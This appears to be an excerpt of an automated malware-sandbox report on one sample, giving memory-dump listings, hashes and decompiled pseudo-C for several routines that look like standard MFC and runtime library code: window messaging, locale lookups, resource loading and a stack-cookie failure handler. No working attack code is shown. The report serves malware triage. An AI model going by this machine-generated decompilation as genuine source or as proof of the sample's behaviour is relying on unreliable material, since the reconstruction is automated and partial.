      • FindFirstFileA.KERNEL32(?,?), ref: 009C8CD2
      • FindClose.KERNEL32(00000000), ref: 009C8CDE
      • lstrlenA.KERNEL32(?), ref: 009C8CFC
      • _strcpy_s.LIBCMT ref: 009C8D20
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: FindPath$CharCloseException@8FileFirstFullH_prolog3_InformationNameThrowUpperVolume__cftof_strcpy_slstrlen
      • String ID:
      • API String ID: 4058050636-0
      • Opcode ID: f213dddb60772aa32e019754e3151cc7a48967bd3cf5f4ff591f056bfc68b681
      • Instruction ID: 9004a8f6ff7ad8be04831c5b18608f63f2d5baed8851e176a810b48e617cb516
      • Opcode Fuzzy Hash: f213dddb60772aa32e019754e3151cc7a48967bd3cf5f4ff591f056bfc68b681
      • Instruction Fuzzy Hash: A941BE71901619ABDF24AFA0CD49FEF777CAF85315F00059DB40AA6291DF308E848E61
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 97%
      			E009A7B6A(intOrPtr* __ecx, int _a4, signed int _a8, intOrPtr _a12) {
      				intOrPtr _v8;
      				void* __ebx;
      				void* __ebp;
      				int _t47;
      				void* _t54;
      				signed int _t63;
      				intOrPtr* _t66;
      				intOrPtr _t67;
      				int _t69;
      				intOrPtr* _t75;
      
      				_t65 = __ecx;
      				_push(__ecx);
      				_t75 = __ecx;
      				_t67 = E009AD852(__ecx);
      				_v8 = _t67;
      				if(_t67 == 0) {
      					E009B8782(_t65);
      				}
      				_t66 =  *((intOrPtr*)(_t75 + 0xa0));
      				_t63 = _a8;
      				_t69 = _a4;
      				if(_t66 == 0) {
      					L5:
      					if(_t63 != 0xffff) {
      						if( *(_t75 + 0xfc) != 0) {
      							 *(_t75 + 0xfc) =  *(_t75 + 0xfc) & 0x00000000;
      							if((_t63 & 0x00002000) != 0 && ( *(_t75 + 0xf0) & 0x00000001) == 0) {
      								_t66 = _t75;
      								 *((intOrPtr*)( *_t75 + 0x184))(2);
      								_t67 = _v8;
      							}
      						}
      						if(_t69 == 0 || (_t63 & 0x00000810) != 0) {
      							 *(_t75 + 0xc8) =  *(_t75 + 0xc8) & 0x00000000;
      							goto L29;
      						} else {
      							if(_t69 - 0xf000 > 0x1ef) {
      								if(_t69 < 0xff00) {
      									L25:
      									 *(_t75 + 0xc8) = _t69;
      									L29:
      									 *(_t67 + 0x58) =  *(_t67 + 0x58) | 0x00000040;
      									L30:
      									_t47 =  *(_t75 + 0xc8);
      									if(_t47 !=  *((intOrPtr*)(_t75 + 0xcc))) {
      										_t47 = E009AC90B(_t63, _t66, _t67, GetParent( *(_t75 + 0x20)));
      										if(_t47 != 0) {
      											_t47 = PostMessageA( *(_t75 + 0x20), 0x36a, 0, 0);
      										}
      									}
      									L33:
      									return _t47;
      								}
      								 *(_t75 + 0xc8) = 0xef1f;
      								goto L29;
      							}
      							_t69 = (_t69 + 0xffff1000 >> 4) + 0xef00;
      							goto L25;
      						}
      					}
      					 *(_t75 + 0x58) =  *(_t75 + 0x58) & 0xffffffbf;
      					if( *((intOrPtr*)(_t67 + 0x88)) != 0) {
      						 *(_t75 + 0xc8) = 0xe002;
      					} else {
      						 *(_t75 + 0xc8) = 0xe001;
      					}
      					SendMessageA( *(_t75 + 0x20), 0x362,  *(_t75 + 0xc8), 0);
      					_t66 = _t75;
      					_t54 =  *((intOrPtr*)( *_t75 + 0x190))();
      					if(_t54 != 0) {
      						UpdateWindow( *(_t54 + 0x20));
      					}
      					if(_a12 == 0 && ( *(_t75 + 0xf0) & 0x00000001) == 0 && GetKeyState(0x79) >= 0 && GetKeyState(0x12) >= 0 &&  *((intOrPtr*)(_t75 + 0x100)) == 0) {
      						_t66 = _t75;
      						 *((intOrPtr*)( *_t75 + 0x184))(2);
      					}
      					goto L30;
      				}
      				_t47 =  *((intOrPtr*)( *_t66 + 0x7c))(_t69, _t63, _a12);
      				if(_t47 != 0) {
      					goto L33;
      				} else {
      					_t67 = _v8;
      					goto L5;
      				}
      			}

      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: MessageState$Exception@8ParentPostSendThrowUpdateWindow
      • String ID:
      • API String ID: 3830675576-0
      • Opcode ID: 14ec493302b7de83f00065b33bcd156d6f4c9e839689e209c73a22dc8f1879e2
      • Instruction ID: abe944925509245d4f9fb8aeb25fd385684034ca57a06f9d70e16152d02eb48d
      • Opcode Fuzzy Hash: 14ec493302b7de83f00065b33bcd156d6f4c9e839689e209c73a22dc8f1879e2
      • Instruction Fuzzy Hash: 6541D471604705DFE7208FA0CC4AFAAF7B9FF41765F108928E49A57291DBB4AC41CB90
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 78%
      			E009B1AD1(void* __ecx, void* __edx, int _a4) {
      				signed int _v8;
      				char _v284;
      				char _v288;
      				void* __ebx;
      				void* __edi;
      				void* __esi;
      				void* __ebp;
      				signed int _t9;
      				struct HINSTANCE__* _t13;
      				intOrPtr* _t20;
      				void* _t28;
      				void* _t29;
      				void* _t30;
      				void* _t36;
      				signed int _t37;
      				void* _t39;
      				void* _t40;
      				signed int _t45;
      				void* _t46;
      
      				_t35 = __edx;
      				_t31 = __ecx;
      				_t43 = _t45;
      				_t46 = _t45 - 0x11c;
      				_t9 =  *0xd0c910; // 0x3a0e8b0c
      				_v8 = _t9 ^ _t45;
      				_t49 = _a4 - 0x800;
      				_t39 = __ecx;
      				_t28 = __edx;
      				if(_a4 != 0x800) {
      					__eflags = GetLocaleInfoA(_a4, 3,  &_v288, 4);
      					if(__eflags == 0) {
      						goto L10;
      					} else {
      						goto L4;
      					}
      				} else {
      					E009A6677(_t31, E00AAF201( &_v288, 4, "LOC"));
      					_t46 = _t46 + 0x10;
      					L4:
      					_push(_t36);
      					_t37 =  *(E00AADB06(_t49));
      					 *(E00AADB06(_t49)) =  *_t16 & 0x00000000;
      					_push( &_v288);
      					_t30 = E00AADA2A( &_v284, 0x112, 0x111, _t39, _t28);
      					_t20 = E00AADB06(_t49);
      					_t50 =  *_t20;
      					if( *_t20 == 0) {
      						 *(E00AADB06(__eflags)) = _t37;
      					} else {
      						E009A9F23( *((intOrPtr*)(E00AADB06(_t50))));
      					}
      					_pop(_t36);
      					if(_t30 == 0xffffffff || _t30 >= 0x112) {
      						L10:
      						_t13 = 0;
      						__eflags = 0;
      					} else {
      						_t13 = LoadLibraryA( &_v284);
      					}
      				}
      				_pop(_t40);
      				_pop(_t29);
      				return E00AAB46A(_t13, _t29, _v8 ^ _t43, _t35, _t36, _t40);
      			}

      APIs
      • _strcpy_s.LIBCMT ref: 009B1B03
        • Part of subcall function 00AADB06: __getptd_noexit.LIBCMT ref: 00AADB06
      • GetLocaleInfoA.KERNEL32(00000800,00000003,?,00000004), ref: 009B1B1B
      • __snwprintf_s.LIBCMT ref: 009B1B50
      • LoadLibraryA.KERNEL32(?), ref: 009B1B8B
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: InfoLibraryLoadLocale__getptd_noexit__snwprintf_s_strcpy_s
      • String ID: LOC
      • API String ID: 1155623865-519433814
      • Opcode ID: 5d852d04a39454c8e15b31c58aa442126f38931902ba0af098ab7b92423d84c9
      • Instruction ID: a80b6618dbbf96cdd3366387cdce1bff86caf91387233a5dfe2c92d2a536e05c
      • Opcode Fuzzy Hash: 5d852d04a39454c8e15b31c58aa442126f38931902ba0af098ab7b92423d84c9
      • Instruction Fuzzy Hash: 8D210672600218AFDB14AB70DD4AFE937ACAF46360F5044B1F616A70E1EB748E05CAA0
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 100%
      			E00AC2663(void* __edi, char* __esi) {
      				short _v8;
      				void* _t24;
      
      				_t24 = __edi;
      				if(__esi == 0 ||  *__esi == 0 || E00AB3030(__esi, ?str?) == 0) {
      					if(GetLocaleInfoW( *(_t24 + 0x1c), 0x20001004,  &_v8, 2) != 0) {
      						if(_v8 != 0) {
      							goto L5;
      						} else {
      							return GetACP();
      						}
      					} else {
      						goto L8;
      					}
      				} else {
      					if(E00AB3030(__esi, ?str?) != 0) {
      						_v8 = E00AB0101(__esi);
      						goto L5;
      					} else {
      						if(GetLocaleInfoW( *(__edi + 0x1c), 0x2000000b,  &_v8, 2) == 0) {
      							L8:
      							return 0;
      						} else {
      							L5:
      							return _v8;
      						}
      					}
      				}
      			}

      APIs
      • GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,?,?,00AC2CA0,?,00ABA8C0,?,000000BC,?,00000001,00000000,00000000), ref: 00AC26A2
      • GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,?,?,00AC2CA0,?,00ABA8C0,?,000000BC,?,00000001,00000000,00000000), ref: 00AC26CB
      • GetACP.KERNEL32(?,?,00AC2CA0,?,00ABA8C0,?,000000BC,?,00000001,00000000), ref: 00AC26DF
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: InfoLocale
      • String ID: ACP$OCP
      • API String ID: 2299586839-711371036
      • Opcode ID: a30e11c49da5140f9a4c4614921d321668e239b6a6e30b989d469bbff5bfcf60
      • Instruction ID: 48850e7120964201bf64e7cfcde60145f14253c19f46c734f31b8aba5b5cc3ef
      • Opcode Fuzzy Hash: a30e11c49da5140f9a4c4614921d321668e239b6a6e30b989d469bbff5bfcf60
      • Instruction Fuzzy Hash: DA01F73160220EBFEB21DBA5ED45F9A37A8EF00758F200059F502E40D1EB74DA82A768
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 85%
      			E00AAB46A(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
      				intOrPtr _v0;
      				void* _v804;
      				intOrPtr _v808;
      				intOrPtr _v812;
      				intOrPtr _t6;
      				intOrPtr _t11;
      				intOrPtr _t12;
      				intOrPtr _t13;
      				long _t17;
      				intOrPtr _t21;
      				intOrPtr _t22;
      				intOrPtr _t25;
      				intOrPtr _t26;
      				intOrPtr _t27;
      				intOrPtr* _t31;
      				void* _t34;
      
      				_t27 = __esi;
      				_t26 = __edi;
      				_t25 = __edx;
      				_t22 = __ecx;
      				_t21 = __ebx;
      				_t6 = __eax;
      				_t34 = _t22 -  *0xd0c910; // 0x3a0e8b0c
      				if(_t34 == 0) {
      					asm("repe ret");
      				}
      				 *0xd13808 = _t6;
      				 *0xd13804 = _t22;
      				 *0xd13800 = _t25;
      				 *0xd137fc = _t21;
      				 *0xd137f8 = _t27;
      				 *0xd137f4 = _t26;
      				 *0xd13820 = ss;
      				 *0xd13814 = cs;
      				 *0xd137f0 = ds;
      				 *0xd137ec = es;
      				 *0xd137e8 = fs;
      				 *0xd137e4 = gs;
      				asm("pushfd");
      				_pop( *0xd13818);
      				 *0xd1380c =  *_t31;
      				 *0xd13810 = _v0;
      				 *0xd1381c =  &_a4;
      				 *0xd13758 = 0x10001;
      				_t11 =  *0xd13810; // 0x0
      				 *0xd1370c = _t11;
      				 *0xd13700 = 0xc0000409;
      				 *0xd13704 = 1;
      				_t12 =  *0xd0c910; // 0x3a0e8b0c
      				_v812 = _t12;
      				_t13 =  *0xd0c914; // 0xc5f174f3
      				_v808 = _t13;
      				 *0xd13750 = IsDebuggerPresent();
      				_push(1);
      				E00AC0028(_t14);
      				SetUnhandledExceptionFilter(0);
      				_t17 = UnhandledExceptionFilter(0xafbbe0);
      				if( *0xd13750 == 0) {
      					_push(1);
      					E00AC0028(_t17);
      				}
      				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
      			}

      APIs
      • IsDebuggerPresent.KERNEL32 ref: 00AB3340
      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00AB3355
      • UnhandledExceptionFilter.KERNEL32(00AFBBE0), ref: 00AB3360
      • GetCurrentProcess.KERNEL32(C0000409), ref: 00AB337C
      • TerminateProcess.KERNEL32(00000000), ref: 00AB3383
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
      • String ID:
      • API String ID: 2579439406-0
      • Opcode ID: 20ec0fbb0921ef673eb215207abd02d266df37597b8257d4e302e6bdf3e6b16b
      • Instruction ID: d9d6053d0cadbb971780a16d150851c447966b3efb37336cbc165b5e6a2d3830
      • Opcode Fuzzy Hash: 20ec0fbb0921ef673eb215207abd02d266df37597b8257d4e302e6bdf3e6b16b
      • Instruction Fuzzy Hash: 3621ADF4912304EFC701DFA4E945A947BF8FB08301F50952AE519D73A1EBB19A82CFA5
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 88%
      			E009AD29D(void* __ecx) {
      				void* __ebx;
      				void* __edi;
      				signed int _t5;
      				void* _t15;
      				void* _t18;
      
      				_t15 = __ecx;
      				if((E009B0A7A(__ecx) & 0x40000000) != 0) {
      					L6:
      					_t5 = E009AC865(_t15, _t15, _t18, __eflags);
      					asm("sbb eax, eax");
      					return  ~( ~_t5);
      				}
      				_t18 = E009A6B56();
      				if(_t18 == 0 || GetKeyState(0x10) < 0 || GetKeyState(0x11) < 0 || GetKeyState(0x12) < 0) {
      					goto L6;
      				} else {
      					SendMessageA( *(_t18 + 0x20), 0x111, 0xe146, 0);
      					return 1;
      				}
      			}

      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: State$LongMessageSendWindow
      • String ID:
      • API String ID: 1063413437-0
      • Opcode ID: c38f8a5a061c4cd2b2b781e02b272404a7818fb17295603198e46e68f1b26791
      • Instruction ID: 986c7ee2ff12aa74eb986f0ef74170d400a73b40912a7c059a966f8139b5f989
      • Opcode Fuzzy Hash: c38f8a5a061c4cd2b2b781e02b272404a7818fb17295603198e46e68f1b26791
      • Instruction Fuzzy Hash: 8DF0893574225F67DA2026B45D01FEA5918DFDABD5F0108357F63EA8D1DEA0D81291F0
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 100%
      			E009B508E(void* __ecx, CHAR* _a4, intOrPtr _a8) {
      				void* __ebx;
      				void* __edi;
      				void* __esi;
      				void* __ebp;
      				void* _t12;
      				CHAR* _t16;
      				void* _t17;
      				void* _t20;
      				void* _t21;
      				struct HINSTANCE__* _t22;
      
      				_t16 = _a4;
      				_t20 = __ecx;
      				 *(__ecx + 0x78) = _t16;
      				if((_t16 & 0xffff0000) == 0) {
      					_t25 =  *(__ecx + 0x74);
      					if( *(__ecx + 0x74) == 0) {
      						 *(__ecx + 0x74) = _t16 & 0x0000ffff;
      					}
      				}
      				_t22 =  *(E009BD77F(_t16, _t20, _t21, _t25) + 0xc);
      				_t17 = LoadResource(_t22, FindResourceA(_t22, _t16, 5));
      				_t12 = E009B504F(_t20, _t17, _a8, _t22);
      				FreeResource(_t17);
      				return _t12;
      			}

      APIs
      • FindResourceA.KERNEL32(?,?,00000005), ref: 009B50BE
      • LoadResource.KERNEL32(?,00000000,?,?,?,?,009A4781,?,?), ref: 009B50C6
      • FreeResource.KERNEL32(00000000,00000000,?,?,?,?,?,?,009A4781,?,?), ref: 009B50DD
      Yara matches
      Similarity
      • API ID: Resource$FindFreeLoad
      • String ID:
      • API String ID: 934874419-0
      • Opcode ID: 096b0c058f825c41f5c6d2c6606a22c313a69052b1e7e3f3dccab4466d4c5afe
      • Instruction ID: 5c14d99125988f0fa7db4ff8ba475d6a8e8218a40113c3639434b8723b810d4c
      • Opcode Fuzzy Hash: 096b0c058f825c41f5c6d2c6606a22c313a69052b1e7e3f3dccab4466d4c5afe
      • Instruction Fuzzy Hash: E1F09072502614BBD7116BAA9D88AAAFBACFF58771B050016F509C7221CB749C4186E1
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 100%
      			E009A836B(void* __ecx, intOrPtr _a4) {
      				void* _t4;
      				intOrPtr _t13;
      				void* _t15;
      
      				_t13 = _a4;
      				_t15 = __ecx;
      				if(_t13 == 0xffffffff) {
      					if(IsWindowVisible( *(__ecx + 0x20)) != 0) {
      						if(IsIconic( *(_t15 + 0x20)) != 0) {
      							_t13 = 9;
      						}
      					} else {
      						_t13 = 1;
      					}
      				}
      				_t4 = E009A68EB(_t15, _t13);
      				if(_t13 == 0xffffffff) {
      					return _t4;
      				}
      				E009B0BD1(_t15, _t13);
      				return E009A68EB(_t15, _t13);
      			}

      APIs
      Yara matches
      Similarity
      • API ID: IconicVisibleWindow
      • String ID:
      • API String ID: 1797901696-0
      • Opcode ID: ffe1edbec4084e8759dc60d069cbeae1ecc29cd47f8ee68821cb61b519d60abf
      • Instruction ID: 91633c7a2a27e089d24166f7a91e407c1d21c1e18f68dd6ad70b731f4708d801
      • Opcode Fuzzy Hash: ffe1edbec4084e8759dc60d069cbeae1ecc29cd47f8ee68821cb61b519d60abf
      • Instruction Fuzzy Hash: 9DF0823230061427CE20263A9D19A5FB66EBFD3F74715062AF56A921F0DEA0C80351D0
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 97%
      			E009A96B5(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
      				void* _t217;
      				int _t249;
      				signed int _t255;
      				signed int _t274;
      				signed int _t276;
      				signed int _t278;
      				signed int _t284;
      				struct HBITMAP__* _t295;
      				signed int _t298;
      				intOrPtr _t299;
      				signed int _t300;
      				long _t301;
      				signed int _t307;
      				intOrPtr _t308;
      				signed int _t309;
      				signed int _t312;
      				int _t394;
      				struct tagMENUITEMINFOA _t396;
      				signed int _t398;
      				RECT* _t399;
      				signed int _t400;
      				void* _t402;
      				void* _t405;
      
      				_t405 = __eflags;
      				_t392 = __edx;
      				_push(0x188);
      				E00AAD29B(0xac7ebc, __ebx, __edi, __esi);
      				_t398 =  *(_t402 + 0xc);
      				 *((intOrPtr*)(_t402 - 0x100)) = __ecx;
      				 *((intOrPtr*)(_t402 - 0x124)) =  *((intOrPtr*)(_t402 + 0x10));
      				E009A5D70(_t402 - 0xec, __edx, E009B9D52());
      				 *((intOrPtr*)(_t402 - 4)) = 0;
      				_t7 = lstrlenA("ReBarWindow32") + 1; // 0x1
      				_t394 = _t7;
      				GetClassNameA( *_t398, E009A5F20(0, _t402 - 0xec, _t392, _t394, _t394), _t394);
      				E009A876D(0, _t402 - 0xec, _t394, 0xffffffff);
      				_t395 = E009AC937(0, _t402 - 0xec, _t392, _t394, _t398, _t405,  *_t398);
      				 *(_t402 - 0xf0) = _t395;
      				if(E009A879C(0, _t402 - 0xec, _t392, _t395, _t398, "ReBarWindow32") != 0 || _t395 == 0 || E009BB8BA(_t395, 0xadb498) == 0) {
      					L54:
      					E009A5510( *((intOrPtr*)(_t402 - 0xec)) + 0xfffffff0, _t392);
      					__eflags = 0;
      				} else {
      					_t217 = E009AD813(_t395);
      					if(_t217 == 0) {
      						L7:
      						 *(_t402 - 0x20) = 0;
      						 *((intOrPtr*)(_t402 - 0x1c)) = 0;
      						 *(_t402 - 0x18) = 0;
      						 *((intOrPtr*)(_t402 - 0x14)) = 0;
      						 *(_t402 - 0x40) = 0;
      						 *((intOrPtr*)(_t402 - 0x3c)) = 0;
      						 *((intOrPtr*)(_t402 - 0x38)) = 0;
      						 *((intOrPtr*)(_t402 - 0x34)) = 0;
      						 *(_t402 - 0x50) = 0;
      						 *((intOrPtr*)(_t402 - 0x4c)) = 0;
      						 *((intOrPtr*)(_t402 - 0x48)) = 0;
      						 *((intOrPtr*)(_t402 - 0x44)) = 0;
      						E009BC2D5(0, _t402 - 0x150, _t392, _t398, __eflags);
      						 *((char*)(_t402 - 4)) = 1;
      						E009A5D70(_t402 - 0xfc, _t392, E009B9D52());
      						 *((char*)(_t402 - 4)) = 2;
      						E009A5D70(_t402 - 0xf4, _t392, E009B9D52());
      						 *((char*)(_t402 - 4)) = 3;
      						E009BA639(_t402 - 0x140);
      						_push( *((intOrPtr*)(_t402 - 0x100)));
      						 *((char*)(_t402 - 4)) = 4;
      						E009BADDE(0, _t402 - 0x164, _t392, _t395, _t398, __eflags);
      						 *(_t402 - 0xe4) =  *((intOrPtr*)(_t395 + 0xb8));
      						_t395 = SendMessageA;
      						 *((char*)(_t402 - 4)) = 5;
      						 *((intOrPtr*)(_t402 - 0xe0)) = 0x10;
      						SendMessageA( *0x00000020, 0x41d,  *(_t398 + 0xc), _t402 - 0xe4);
      						SendMessageA( *( *(_t402 - 0xf0) + 0x20), 0x409,  *(_t398 + 0xc), _t402 - 0x20);
      						 *(_t402 - 0xf8) = lstrlenA("ToolbarWindow32") + 1;
      						GetClassNameA( *(_t402 - 0xc4), E009A5F20(0, _t402 - 0xec, _t392, SendMessageA, lstrlenA("ToolbarWindow32") + 1),  *(_t402 - 0xf8));
      						E009A876D(0, _t402 - 0xec, SendMessageA, 0xffffffff);
      						 *(_t402 - 0x104) = E009AC937(0, _t402 - 0xec, _t392, SendMessageA, _t398, __eflags,  *(_t402 - 0xc4));
      						__eflags = E009A879C(0, _t402 - 0xec, _t392, _t395, _t398, "ToolbarWindow32");
      						if(__eflags != 0) {
      							L53:
      							 *((char*)(_t402 - 4)) = 4;
      							E009BAE32(0, _t402 - 0x164, _t392, _t395, _t398, __eflags);
      							 *((char*)(_t402 - 4)) = 3;
      							E009BADC5(_t402 - 0x140);
      							E009A5510( *((intOrPtr*)(_t402 - 0xf4)) + 0xfffffff0, _t392);
      							__eflags =  *((intOrPtr*)(_t402 - 0xfc)) + 0xfffffff0;
      							E009A5510( *((intOrPtr*)(_t402 - 0xfc)) + 0xfffffff0, _t392);
      							 *((char*)(_t402 - 4)) = 0;
      							E009A9488(0, _t402 - 0x150, _t395, _t398, __eflags);
      							goto L54;
      						} else {
      							_t362 =  *(_t402 - 0x104);
      							__eflags =  *(_t402 - 0x104);
      							if(__eflags == 0) {
      								goto L53;
      							} else {
      								__eflags = E009BB8BA(_t362, 0xadb464);
      								if(__eflags == 0) {
      									goto L53;
      								} else {
      									_t399 = _t398 + 0x18;
      									__eflags = _t399;
      									 *(_t402 - 0x18) = _t399->left;
      									 *(_t402 - 0x130) = _t399;
      									E009BAAE4( *(_t402 - 0xf0), _t402 - 0x20);
      									_t400 =  *(_t402 - 0x104);
      									E009BAAA3(_t400, _t402 - 0x20);
      									_t249 = SendMessageA( *(_t400 + 0x20), 0x418, 0, 0);
      									 *(_t402 - 0xf0) = _t249;
      									 *(_t402 - 0xe8) = _t249;
      									while(1) {
      										 *(_t402 - 0xe8) =  *(_t402 - 0xe8) - 1;
      										SendMessageA( *(_t400 + 0x20), 0x41d,  *(_t402 - 0xe8), _t402 - 0x40);
      										_t255 = IntersectRect(_t402 - 0x50, _t402 - 0x20, _t402 - 0x40);
      										__eflags = _t255;
      										if(_t255 != 0) {
      											break;
      										}
      										__eflags =  *(_t402 - 0xe8);
      										if( *(_t402 - 0xe8) > 0) {
      											continue;
      										}
      										break;
      									}
      									_t396 = 0x30;
      									E00AAB3F0(_t402 - 0x194, 0, _t396);
      									 *(_t402 - 0x194) = _t396;
      									 *(_t402 - 0xf8) = E009A6C17(_t400);
      									E009BBEBF(_t402 - 0x118);
      									 *((intOrPtr*)(_t402 - 0x118)) = 0xad7b6c;
      									 *((char*)(_t402 - 4)) = 6;
